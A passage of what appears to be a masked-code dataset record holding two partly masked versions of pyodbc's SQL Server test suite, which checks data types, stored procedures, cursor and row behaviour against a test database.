pyodbc.Cursor):\n value = True\n cursor.execute('create table t1(b bit)')\n cursor.execute('insert into t1 values (?)', value)\n v = cursor.execute('select b from t1').fetchone()[0]\n assert isinstance(v, bool)\n assert v == value\n\n\n<mask token>\n\n\ndef test_decimal_e(cursor: pyodbc.Cursor):\n \"\"\"Ensure exponential notation decimals are properly handled\"\"\"\n value = Decimal((0, (1, 2, 3), 5))\n cursor.execute('create table t1(d decimal(10, 2))')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select * from t1').fetchone()[0]\n assert result == value\n\n\n<mask token>\n\n\ndef test_empty_string(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '')\n\n\n<mask token>\n\n\ndef test_negative_row_index(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '1')\n row = cursor.execute('select * from t1').fetchone()\n assert row[0] == '1'\n assert row[-1] == '1'\n\n\ndef test_version():\n assert 3 == len(pyodbc.version.split('.'))\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008, reason=\n 'Date not supported until 2008?')\ndef test_date(cursor: pyodbc.Cursor):\n value = date.today()\n cursor.execute('create table t1(d date)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select d from t1').fetchone()[0]\n assert isinstance(result, date)\n assert value == result\n\n\n<mask token>\n\n\ndef test_datetime2(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n cursor.execute('create table t1(dt datetime2)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\n<mask token>\n\n\ndef test_sp_results_from_temp(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n select top 10 name, id, xtype, refdate\n into #tmptable\n from sysobjects\n\n select * from #tmptable\n \"\"\"\n )\n cursor.execute('exec proc1')\n assert cursor.description is not None\n assert len(cursor.description) == 4\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\n<mask token>\n\n\ndef test_sp_with_dates(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\"\n )\n cursor.execute(\n \"\"\"\n create procedure test_sp(@d1 datetime, @d2 datetime)\n AS\n declare @d as int\n set @d = datediff(year, @d1, @d2)\n select @d\n \"\"\"\n )\n cursor.execute('exec test_sp ?, ?', datetime.now(), datetime.now())\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] == 0\n\n\n<mask token>\n\n\ndef test_rowcount_select(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.rowcount is set properly after a select statement.\n\n pyodbc calls SQLRowCount after each execute and sets Cursor.rowcount, but SQL Server 2005\n returns -1 after a select statement, so we'll test for that behavior. This is valid\n behavior according to the DB API specification, but people don't seem to like it.\n \"\"\"\n cursor.execute('create table t1(i int)')\n count = 4\n for i in range(count):\n cursor.execute('insert into t1 values (?)', i)\n cursor.execute('select * from t1')\n assert cursor.rowcount == -1\n rows = cursor.fetchall()\n assert len(rows) == count\n assert cursor.rowcount == -1\n\n\n<mask token>\n\n\ndef test_retcursor_delete(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(i int)')\n cursor.execute('insert into t1 values (1)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\ndef test_retcursor_nodata(cursor: pyodbc.Cursor):\n \"\"\"\n This represents a different code path than a delete that deleted something.\n\n The return value is SQL_NO_DATA and code after it was causing an error. We could use\n SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount\n code.\n \"\"\"\n cursor.execute('create table t1(i int)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\n<mask token>\n\n\ndef test_row_description(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.description is accessible as Row.cursor_description.\n \"\"\"\n cursor.execute('create table t1(a int, b char(3))')\n cursor.execute(\"insert into t1 values(1, 'abc')\")\n row = cursor.execute('select * from t1').fetchone()\n assert cursor.description == row.cursor_description\n\n\ndef test_temp_select(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s char(7))')\n cursor.execute('insert into t1 values(?)', 'testing')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n cursor.execute('select s into t2 from t1')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n\n\n<mask token>\n\n\ndef test_row_slicing(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d int)')\n cursor.execute('insert into t1 values(1,2,3,4)')\n row = cursor.execute('select * from t1').fetchone()\n result = row[:]\n assert result is row\n result = row[:-1]\n assert result == (1, 2, 3)\n result = row[0:4]\n assert result is row\n\n\ndef test_row_repr(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d varchar(50))')\n cursor.execute(\"insert into t1 values(1,2,3,'four')\")\n row = cursor.execute('select * from t1').fetchone()\n result = str(row)\n assert result == \"(1, 2, 3, 'four')\"\n result = str(row[:-1])\n assert result == '(1, 2, 3)'\n result = str(row[:1])\n assert result == '(1,)'\n\n\ndef test_concatenation(cursor: pyodbc.Cursor):\n v2 = '0123456789' * 30\n v3 = '9876543210' * 30\n cursor.execute(\n 'create table t1(c1 int identity(1, 1), c2 varchar(300), c3 varchar(300))'\n )\n cursor.execute('insert into t1(c2, c3) values (?,?)', v2, v3)\n row = cursor.execute('select c2, c3, c2 + c3 as both from t1').fetchone()\n assert row.both == v2 + v3\n\n\n<mask token>\n\n\ndef test_sqlserver_callproc(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop procedure pyodbctest')\n cursor.commit()\n except:\n pass\n cursor.execute('create table t1(s varchar(10))')\n cursor.execute('insert into t1 values(?)', 'testing')\n cursor.execute(\n \"\"\"\n create procedure pyodbctest @var1 varchar(32)\n as\n begin\n select s from t1\n return\n end\n \"\"\"\n )\n cursor.execute(\"exec pyodbctest 'hi'\")\n\n\ndef test_skip(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(id int)')\n for i in range(1, 5):\n cursor.execute('insert into t1 values(?)', i)\n cursor.execute('select id from t1 order by id')\n assert cursor.fetchone()[0] == 1\n cursor.skip(2)\n assert cursor.fetchone()[0] == 4\n\n\n<mask token>\n\n\ndef test_sets_execute(cursor: pyodbc.Cursor):\n cursor.execute('create table t1 (word varchar (100))')\n words = {'a', 'b', 'c'}\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('insert into t1 (word) values (?)', words)\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.executemany('insert into t1 (word) values (?)', words)\n\n\n<mask token>\n\n\ndef test_row_executemany(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to executemany\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n for i in range(3):\n cursor.execute('insert into t1 values (?, ?)', i, chr(ord('a') + i))\n rows = cursor.execute('select n, s from t1').fetchall()\n assert len(rows) != 0\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.executemany('insert into t2 values (?, ?)', rows)\n\n\ndef test_description(cursor: pyodbc.Cursor):\n \"\"\"Ensure cursor.description is correct\"\"\"\n cursor.execute('create table t1(n int, s varchar(8), d decimal(5,2))')\n cursor.execute(\"insert into t1 values (1, 'abc', '1.23')\")\n cursor.execute('select * from t1')\n t = cursor.description[0]\n assert t[0] == 'n'\n assert t[1] == int\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[1]\n assert t[0] == 's'\n assert t[1] == str\n assert t[4] == 8\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[2]\n assert t[0] == 'd'\n assert t[1] == Decimal\n assert t[4] == 5\n assert t[5] == 2\n assert t[6] is True\n\n\n<mask token>\n\n\ndef test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):\n \"\"\"\n Complex scenario to test the Cursor.messages attribute.\n \"\"\"\n cursor.execute(\n \"\"\"\n create or alter procedure test_cursor_messages as\n begin\n set nocount on;\n print 'Message 1a';\n print 'Message 1b';\n select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';\n select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';\n print 'Message 2a';\n print 'Message 2b';\n end\n \"\"\"\n )\n cursor.execute('exec test_cursor_messages')\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 1a', 'Field 1b']\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 1a', 'Message 1b']\n assert cursor.nextset()\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 2a', 'Field 2b']\n assert not cursor.messages\n assert cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 2a', 'Message 2b']\n assert not cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n assert not cursor.messages\n\n\n<mask token>\n\n\ndef test_context_manager_success():\n \"\"\"Ensure `with` commits if an exception is not raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cnxn.commit()\n with cnxn:\n cursor.execute('insert into t1 values (1)')\n rows = cursor.execute('select n from t1').fetchall()\n assert len(rows) == 1\n assert rows[0][0] == 1\n\n\ndef test_context_manager_failure(cursor: pyodbc.Cursor):\n \"\"\"Ensure `with` rolls back if an exception is raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (1)')\n cnxn.commit()\n with pytest.raises(pyodbc.Error):\n with cnxn:\n cursor.execute('insert into t1 values (2)')\n cursor.execute('delete from bogus')\n cursor.execute('select max(n) from t1')\n val = cursor.fetchval()\n assert val == 1\n\n\ndef test_untyped_none(cursor: pyodbc.Cursor):\n value = cursor.execute('select ?', None).fetchone()[0]\n assert value is None\n\n\n<mask token>\n\n\ndef test_columns(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b varchar(3), xΏz varchar(4))')\n cursor.columns('t1')\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n cursor.columns('t1', schema=None, catalog=None)\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n row = results['xΏz']\n assert row.type_name == 'varchar'\n assert row.column_size == 4, row.column_size\n for i in range(8, 16):\n table_name = 'pyodbc_89abcdef'[:i]\n cursor.execute(\n f\"\"\"\n IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};\n CREATE TABLE {table_name} (id INT PRIMARY KEY);\n \"\"\"\n )\n col_count = len([col.column_name for col in cursor.columns(table_name)]\n )\n assert col_count == 1\n cursor.execute(f'drop table {table_name}')\n\n\n<mask token>\n\n\ndef test_emoticons_as_parameter(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute('insert into t1 values (?)', v)\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\n<mask token>\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp_diffschema(cursor: pyodbc.Cursor):\n _test_tvp(cursor, True)\n\n\n<mask token>\n\n\n@lru_cache()\ndef _generate_str(length, encoding=None):\n \"\"\"\n Returns either a string or bytes, depending on whether encoding is provided,\n that is `length` elements long.\n\n If length is None, None is returned. This simplifies the tests by letting us put None into\n an array of other lengths and pass them here, moving the special case check into one place.\n \"\"\"\n if length is None:\n return None\n v = 'á'\n remaining = max(0, length - len(v))\n if remaining:\n seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'\n if remaining <= len(seed):\n v += seed\n else:\n c = remaining + len(seed) - 1 // len(seed)\n v += seed * c\n if encoding:\n v = v.encode(encoding)\n v = v[:length]\n return v\n",
"step-2": "<mask token>\n\n\ndef connect(autocommit=False, attrs_before=None):\n return pyodbc.connect(CNXNSTR, autocommit=autocommit, attrs_before=\n attrs_before)\n\n\n<mask token>\n\n\ndef test_nvarchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'nvarchar')\n\n\ndef test_varbinary(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varbinary')\n\n\[email protected](SQLSERVER_YEAR < 2005, reason=\n '(max) not supported until 2005')\ndef test_unicode_longmax(cursor: pyodbc.Cursor):\n cursor.execute(\"select cast(replicate(N'x', 512) as nvarchar(max))\")\n\n\n<mask token>\n\n\ndef test_int(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'int', [None, -1, 0, 1, 12345678])\n\n\ndef test_bigint(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'bigint', [None, -1, 0, 1, 4886718345, 2147483647,\n 4294967295, 4886718345])\n\n\ndef test_overflow_int(cursor: pyodbc.Cursor):\n input = 9999999999999999999999999999999999999\n cursor.execute('create table t1(d bigint)')\n with pytest.raises(OverflowError):\n cursor.execute('insert into t1 values (?)', input)\n result = cursor.execute('select * from t1').fetchall()\n assert result == []\n\n\n<mask token>\n\n\ndef test_drivers():\n p = pyodbc.drivers()\n assert isinstance(p, list)\n\n\ndef test_datasources():\n p = pyodbc.dataSources()\n assert isinstance(p, dict)\n\n\n<mask token>\n\n\ndef test_getinfo_bool():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_ACCESSIBLE_TABLES)\n assert isinstance(value, bool)\n\n\ndef test_getinfo_int():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_DEFAULT_TXN_ISOLATION)\n assert isinstance(value, int)\n\n\ndef test_getinfo_smallint():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CONCAT_NULL_BEHAVIOR)\n assert isinstance(value, int)\n\n\ndef test_no_fetch(cursor: pyodbc.Cursor):\n cursor.execute('select 1')\n cursor.execute('select 1')\n cursor.execute('select 1')\n\n\n<mask token>\n\n\ndef test_exc_integrity(cursor: pyodbc.Cursor):\n \"\"\"Make sure an IntegretyError is raised\"\"\"\n cursor.execute('create table t1(s1 varchar(10) primary key)')\n cursor.execute(\"insert into t1 values ('one')\")\n with pytest.raises(pyodbc.IntegrityError):\n cursor.execute(\"insert into t1 values ('one')\")\n\n\ndef test_multiple_bindings(cursor: pyodbc.Cursor):\n \"\"\"More than one bind and select on a cursor\"\"\"\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (?)', 1)\n cursor.execute('insert into t1 values (?)', 2)\n cursor.execute('insert into t1 values (?)', 3)\n for _ in range(3):\n cursor.execute('select n from t1 where n < ?', 10)\n cursor.execute('select n from t1 where n < 3')\n\n\n<mask token>\n\n\ndef _test_vartype(cursor: pyodbc.Cursor, datatype):\n if datatype == 'text':\n lengths = LARGE_FENCEPOST_SIZES\n else:\n lengths = SMALL_FENCEPOST_SIZES\n if datatype == 'text':\n cursor.execute(f'create table t1(c1 {datatype})')\n else:\n maxlen = lengths[-1]\n cursor.execute(f'create table t1(c1 {datatype}({maxlen}))')\n for length in lengths:\n cursor.execute('delete from t1')\n encoding = datatype in ('blob', 'varbinary') and 'utf8' or None\n value = _generate_str(length, encoding=encoding)\n try:\n cursor.execute('insert into t1 values(?)', value)\n except pyodbc.Error as ex:\n msg = f'{datatype} insert failed: length={length} len={len(value)}'\n raise Exception(msg) from ex\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\n<mask token>\n\n\ndef test_noscan(cursor: pyodbc.Cursor):\n assert cursor.noscan is False\n cursor.noscan = True\n assert cursor.noscan is True\n\n\n<mask token>\n\n\ndef test_native_uuid(cursor: pyodbc.Cursor):\n value = uuid.uuid4()\n cursor.execute('create table t1(n uniqueidentifier)')\n cursor.execute('insert into t1 values (?)', value)\n pyodbc.native_uuid = True\n result = cursor.execute('select n from t1').fetchval()\n assert isinstance(result, uuid.UUID)\n assert value == result\n\n\n<mask token>\n\n\[email protected](IS_FREEDTS, reason=\n 'https://github.com/FreeTDS/freetds/issues/230')\ndef test_nextset_with_raiserror(cursor: pyodbc.Cursor):\n cursor.execute(\"select i = 1; RAISERROR('c', 16, 1);\")\n row = next(cursor)\n assert 1 == row.i\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.nextset()\n\n\n<mask token>\n\n\ndef test_bit(cursor: pyodbc.Cursor):\n value = True\n cursor.execute('create table t1(b bit)')\n cursor.execute('insert into t1 values (?)', value)\n v = cursor.execute('select b from t1').fetchone()[0]\n assert isinstance(v, bool)\n assert v == value\n\n\ndef test_decimal(cursor: pyodbc.Cursor):\n for precision, scale, negative in [(1, 0, False), (1, 0, True), (6, 0, \n False), (6, 2, False), (6, 4, True), (6, 6, True), (38, 0, False),\n (38, 10, False), (38, 38, False), (38, 0, True), (38, 10, True), (\n 38, 38, True)]:\n try:\n cursor.execute('drop table t1')\n except:\n pass\n cursor.execute(f'create table t1(d decimal({precision}, {scale}))')\n sign = negative and '-' or ''\n before = '9' * (precision - scale)\n after = scale and '.' + '9' * scale or ''\n decStr = f'{sign}{before}{after}'\n value = Decimal(decStr)\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select d from t1').fetchone()[0]\n assert v == value\n\n\ndef test_decimal_e(cursor: pyodbc.Cursor):\n \"\"\"Ensure exponential notation decimals are properly handled\"\"\"\n value = Decimal((0, (1, 2, 3), 5))\n cursor.execute('create table t1(d decimal(10, 2))')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select * from t1').fetchone()[0]\n assert result == value\n\n\n<mask token>\n\n\ndef test_empty_string(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '')\n\n\n<mask token>\n\n\ndef test_negative_row_index(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '1')\n row = cursor.execute('select * from t1').fetchone()\n assert row[0] == '1'\n assert row[-1] == '1'\n\n\ndef test_version():\n assert 3 == len(pyodbc.version.split('.'))\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008, reason=\n 'Date not supported until 2008?')\ndef test_date(cursor: pyodbc.Cursor):\n value = date.today()\n cursor.execute('create table t1(d date)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select d from t1').fetchone()[0]\n assert isinstance(result, date)\n assert value == result\n\n\n<mask token>\n\n\ndef test_datetime2(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n cursor.execute('create table t1(dt datetime2)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_sp_results(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n select top 10 name, id, xtype, refdate\n from sysobjects\n \"\"\"\n )\n rows = cursor.execute('exec proc1').fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_temp(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n select top 10 name, id, xtype, refdate\n into #tmptable\n from sysobjects\n\n select * from #tmptable\n \"\"\"\n )\n cursor.execute('exec proc1')\n assert cursor.description is not None\n assert len(cursor.description) == 4\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\n<mask token>\n\n\ndef test_sp_with_dates(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\"\n )\n cursor.execute(\n \"\"\"\n create procedure test_sp(@d1 datetime, @d2 datetime)\n AS\n declare @d as int\n set @d = datediff(year, @d1, @d2)\n select @d\n \"\"\"\n )\n cursor.execute('exec test_sp ?, ?', datetime.now(), datetime.now())\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] == 0\n\n\n<mask token>\n\n\ndef test_rowcount_select(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.rowcount is set properly after a select statement.\n\n pyodbc calls SQLRowCount after each execute and sets Cursor.rowcount, but SQL Server 2005\n returns -1 after a select statement, so we'll test for that behavior. This is valid\n behavior according to the DB API specification, but people don't seem to like it.\n \"\"\"\n cursor.execute('create table t1(i int)')\n count = 4\n for i in range(count):\n cursor.execute('insert into t1 values (?)', i)\n cursor.execute('select * from t1')\n assert cursor.rowcount == -1\n rows = cursor.fetchall()\n assert len(rows) == count\n assert cursor.rowcount == -1\n\n\n<mask token>\n\n\ndef test_retcursor_delete(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(i int)')\n cursor.execute('insert into t1 values (1)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\ndef test_retcursor_nodata(cursor: pyodbc.Cursor):\n \"\"\"\n This represents a different code path than a delete that deleted something.\n\n The return value is SQL_NO_DATA and code after it was causing an error. We could use\n SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount\n code.\n \"\"\"\n cursor.execute('create table t1(i int)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\n<mask token>\n\n\ndef test_row_description(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.description is accessible as Row.cursor_description.\n \"\"\"\n cursor.execute('create table t1(a int, b char(3))')\n cursor.execute(\"insert into t1 values(1, 'abc')\")\n row = cursor.execute('select * from t1').fetchone()\n assert cursor.description == row.cursor_description\n\n\ndef test_temp_select(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s char(7))')\n cursor.execute('insert into t1 values(?)', 'testing')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n cursor.execute('select s into t2 from t1')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n\n\n<mask token>\n\n\ndef test_executemany_dae_0(cursor: pyodbc.Cursor):\n \"\"\"\n DAE for 0-length value\n \"\"\"\n cursor.execute('create table t1(a nvarchar(max))')\n cursor.fast_executemany = True\n cursor.executemany('insert into t1(a) values(?)', [['']])\n assert cursor.execute('select a from t1').fetchone()[0] == ''\n cursor.fast_executemany = False\n\n\n<mask token>\n\n\ndef test_row_slicing(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d int)')\n cursor.execute('insert into t1 values(1,2,3,4)')\n row = cursor.execute('select * from t1').fetchone()\n result = row[:]\n assert result is row\n result = row[:-1]\n assert result == (1, 2, 3)\n result = row[0:4]\n assert result is row\n\n\ndef test_row_repr(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d varchar(50))')\n cursor.execute(\"insert into t1 values(1,2,3,'four')\")\n row = cursor.execute('select * from t1').fetchone()\n result = str(row)\n assert result == \"(1, 2, 3, 'four')\"\n result = str(row[:-1])\n assert result == '(1, 2, 3)'\n result = str(row[:1])\n assert result == '(1,)'\n\n\ndef test_concatenation(cursor: pyodbc.Cursor):\n v2 = '0123456789' * 30\n v3 = '9876543210' * 30\n cursor.execute(\n 'create table t1(c1 int identity(1, 1), c2 varchar(300), c3 varchar(300))'\n )\n cursor.execute('insert into t1(c2, c3) values (?,?)', v2, v3)\n row = cursor.execute('select c2, c3, c2 + c3 as both from t1').fetchone()\n assert row.both == v2 + v3\n\n\n<mask token>\n\n\ndef test_sqlserver_callproc(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop procedure pyodbctest')\n cursor.commit()\n except:\n pass\n cursor.execute('create table t1(s varchar(10))')\n cursor.execute('insert into t1 values(?)', 'testing')\n cursor.execute(\n \"\"\"\n create procedure pyodbctest @var1 varchar(32)\n as\n begin\n select s from t1\n return\n end\n \"\"\"\n )\n cursor.execute(\"exec pyodbctest 'hi'\")\n\n\ndef test_skip(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(id int)')\n for i in range(1, 5):\n cursor.execute('insert into t1 values(?)', i)\n cursor.execute('select id from t1 order by id')\n assert cursor.fetchone()[0] == 1\n cursor.skip(2)\n assert cursor.fetchone()[0] == 4\n\n\ndef test_timeout():\n cnxn = connect()\n assert cnxn.timeout == 0\n cnxn.timeout = 30\n assert cnxn.timeout == 30\n cnxn.timeout = 0\n assert cnxn.timeout == 0\n\n\ndef test_sets_execute(cursor: pyodbc.Cursor):\n cursor.execute('create table t1 (word varchar (100))')\n words = {'a', 'b', 'c'}\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('insert into t1 (word) values (?)', words)\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.executemany('insert into t1 (word) values (?)', words)\n\n\n<mask token>\n\n\ndef test_row_executemany(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to executemany\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n for i in range(3):\n cursor.execute('insert into t1 values (?, ?)', i, chr(ord('a') + i))\n rows = cursor.execute('select n, s from t1').fetchall()\n assert len(rows) != 0\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.executemany('insert into t2 values (?, ?)', rows)\n\n\ndef test_description(cursor: pyodbc.Cursor):\n \"\"\"Ensure cursor.description is correct\"\"\"\n cursor.execute('create table t1(n int, s varchar(8), d decimal(5,2))')\n cursor.execute(\"insert into t1 values (1, 'abc', '1.23')\")\n cursor.execute('select * from t1')\n t = cursor.description[0]\n assert t[0] == 'n'\n assert t[1] == int\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[1]\n assert t[0] == 's'\n assert t[1] == str\n assert t[4] == 8\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[2]\n assert t[0] == 'd'\n assert t[1] == Decimal\n assert t[4] == 5\n assert t[5] == 2\n assert t[6] is True\n\n\n<mask token>\n\n\ndef test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):\n \"\"\"\n Complex scenario to test the Cursor.messages attribute.\n \"\"\"\n cursor.execute(\n \"\"\"\n create or alter procedure test_cursor_messages as\n begin\n set nocount on;\n print 'Message 1a';\n print 'Message 1b';\n select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';\n select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';\n print 'Message 2a';\n print 'Message 2b';\n end\n \"\"\"\n )\n cursor.execute('exec test_cursor_messages')\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 1a', 'Field 1b']\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 1a', 'Message 1b']\n assert cursor.nextset()\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 2a', 'Field 2b']\n assert not cursor.messages\n assert cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 2a', 'Message 2b']\n assert not cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n assert not cursor.messages\n\n\ndef test_none_param(cursor: pyodbc.Cursor):\n \"\"\"Ensure None can be used for params other than the first\"\"\"\n cursor.execute('create table t1(n int, blob varbinary(max))')\n cursor.execute('insert into t1 values (1, newid())')\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 1\n assert isinstance(row.blob, bytes)\n sql = 'update t1 set n=?, blob=?'\n try:\n cursor.execute(sql, 2, None)\n except pyodbc.DataError:\n if IS_FREEDTS:\n cursor.setinputsizes([(), (pyodbc.SQL_VARBINARY, None, None)])\n cursor.execute(sql, 2, None)\n else:\n raise\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 2\n assert row.blob is None\n\n\ndef test_output_conversion():\n\n def convert1(value):\n return 'X' + value.decode('latin1') + 'X'\n\n def convert2(value):\n return 'Y' + value.decode('latin1') + 'Y'\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int, v varchar(10))')\n cursor.execute(\"insert into t1 values (1, '123.45')\")\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.remove_output_converter(pyodbc.SQL_VARCHAR)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, None)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is not None\n 